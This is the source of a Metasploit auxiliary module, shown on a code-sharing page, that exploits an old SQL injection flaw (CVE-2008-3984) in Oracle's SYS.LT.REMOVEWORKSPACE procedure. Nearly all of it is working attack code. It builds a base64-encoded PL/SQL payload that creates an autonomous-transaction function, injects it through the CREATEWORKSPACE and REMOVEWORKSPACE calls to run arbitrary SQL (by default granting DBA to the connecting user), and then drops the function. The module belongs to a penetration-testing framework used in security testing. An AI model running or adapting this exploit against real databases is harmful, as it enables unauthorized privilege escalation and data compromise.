Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE',

14
        'Description' => %q{

15
          This module exploits a sql injection flaw in the REMOVEWORKSPACE

16
          procedure of the PL/SQL package SYS.LT. Any user with execute

17
          privilege on the vulnerable package can exploit this vulnerability.

18
        },

19
        'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],

20
        'License' => MSF_LICENSE,

21
        'References' => [

22
          [ 'CVE', '2008-3984' ],

23
          [ 'OSVDB', '49326']

24
        ],

25
        'DisclosureDate' => '2008-10-13',

26
        'Notes' => {

27
          'Stability' => [CRASH_SAFE],

28
          'SideEffects' => [IOC_IN_LOGS],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33


34
    register_options(

35
      [

36
        OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),

37
      ]

38
    )

39
  end

40


41
  def run

42
    return if !check_dependencies

43


44
    name = Rex::Text.rand_text_alpha_upper(1..10)

45
    rand1 = Rex::Text.rand_text_alpha_upper(1..10)

46
    rand2 = Rex::Text.rand_text_alpha_upper(1..10)

47
    rand3 = Rex::Text.rand_text_alpha_upper(1..10)

48
    cruft = Rex::Text.rand_text_alpha_upper(1)

49


50
    function = "

51
      CREATE OR REPLACE FUNCTION #{cruft}

52
      RETURN VARCHAR2 AUTHID CURRENT_USER

53
      AS

54
      PRAGMA AUTONOMOUS_TRANSACTION;

55
      BEGIN

56
      EXECUTE IMMEDIATE '#{datastore['SQL']}';

57
      COMMIT;

58
      RETURN '#{cruft}';

59
      END;"

60


61
    package1 = %|

62
      BEGIN

63
        SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

64
      END;

65
      |

66


67
    package2 = %|

68
      BEGIN

69
        SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');

70
      END;

71
      |

72


73
    uno = Rex::Text.encode_base64(function)

74
    dos = Rex::Text.encode_base64(package1)

75
    tres = Rex::Text.encode_base64(package2)

76


77
    sql = %|

78
      DECLARE

79
      #{rand1} VARCHAR2(32767);

80
      #{rand2} VARCHAR2(32767);

81
      #{rand3} VARCHAR2(32767);

82
      BEGIN

83
      #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));

84
      EXECUTE IMMEDIATE #{rand1};

85
      #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));

86
      EXECUTE IMMEDIATE #{rand2};

87
      #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));

88
      EXECUTE IMMEDIATE #{rand3};

89
      END;

90
      |

91


92
    clean = "DROP FUNCTION #{cruft}"

93


94
    # Try first, if it's good.. keep doing the dance.

95
    print_status('Attempting sql injection on SYS.LT.REMOVEWORKSPACE...')

96
    begin

97
      prepare_exec(sql)

98
    rescue StandardError

99
      return

100
    end

101


102
    print_status("Removing function '#{cruft}'...")

103
    prepare_exec(clean)

104
  end

105
end

106


107